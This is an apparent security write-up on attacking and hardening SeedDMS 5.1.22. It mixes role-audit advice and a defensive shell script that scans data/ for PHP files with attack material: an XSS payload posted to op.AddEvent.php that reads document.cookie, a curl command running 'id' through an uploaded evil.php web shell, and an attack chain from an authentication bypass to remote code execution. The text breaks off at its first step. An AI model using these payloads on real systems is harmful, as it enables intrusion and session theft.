SeedDMS 5.1.22 | Exploit
Audit your user roles. Ensure that only highly trusted users have the permission to "Add Documents" or "Manage Extensions."
SeedDMS 5.1.22 is a specific release of the document management system that, while functional, has been identified as particularly vulnerable to a range of security exploits. The version number often surfaces in security write-ups and CTF (Capture The Flag) challenges, making it a critical point of reference for security professionals and penetration testers.
Review all existing user accounts for unauthorized low-level users who might have the "write" permissions required to upload documents.
POST /seeddms/op/op.AddEvent.php HTTP/1.1
Host: target-dms.local
...

name=Q4_Report&comment=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Recursively search for PHP files in the data/ directory:
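One way to run the search for PHP files under data/, as an added example (not from the original page or the SeedDMS project). It flags files by extension and also by a PHP open tag in the content, since a renamed upload would evade a name-only search. The function names and the extension list are assumptions; pass in the data/ path of your own installation.

```shell
#!/bin/sh
# Added example: list files under a SeedDMS data/ directory that the web
# server could run as PHP. Function names are hypothetical; the directory
# to scan is supplied by the caller.

# Print "ext <path>" for files whose name carries a PHP-handled extension.
# The extension list is an assumption; match it to your server's handlers.
find_php_by_name() {
    find "$1" -type f \( -iname '*.php' -o -iname '*.php[0-9]' \
        -o -iname '*.phtml' -o -iname '*.phar' -o -iname '*.pht' \
        -o -iname '*.php.*' \) -print | sed 's/^/ext /'
}

# Print "tag <path>" for files containing a PHP open tag, whatever the name.
# grep -l also reports matches inside binary files (e.g. a tagged image).
find_php_by_content() {
    find "$1" -type f -exec grep -lE '<\?(php|=)' {} + 2>/dev/null \
        | sed 's/^/tag /'
}

# Run both checks and return one de-duplicated, sorted list of findings.
scan_seeddms_data() {
    [ -d "$1" ] || { echo "not a directory: $1" >&2; return 2; }
    { find_php_by_name "$1"; find_php_by_content "$1"; } | sort -u
}

# Stand-alone use: sh scan.sh /path/to/seeddms/data
if [ "$#" -gt 0 ]; then
    scan_seeddms_data "$1"
fi
```

Any finding is a lead to review rather than proof of compromise; check the file's owner, timestamps and the matching document record before removing it.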
curl "http://192.168.1.100/seeddms51/data/1000/1/1/evil.php?cmd=id"
If the web server is configured to execute PHP files (default for SeedDMS), an uploaded web shell (e.g., shell.php) placed within the data/ directory or its subfolders can be accessed directly via HTTP. The attacker then gains the privileges of the web server user (commonly www-data).
[Unauthenticated Attacker]
        │
        ▼
[Bypass Authentication (CVE-2019-12745)]
        │
        ▼
[Gain Admin Session]
        │
        ▼
[Upload Malicious PHP Shell]
        │
        ▼
[Execute Remote Code (RCE)]

Step 1: Session Hijacking and Authentication Bypass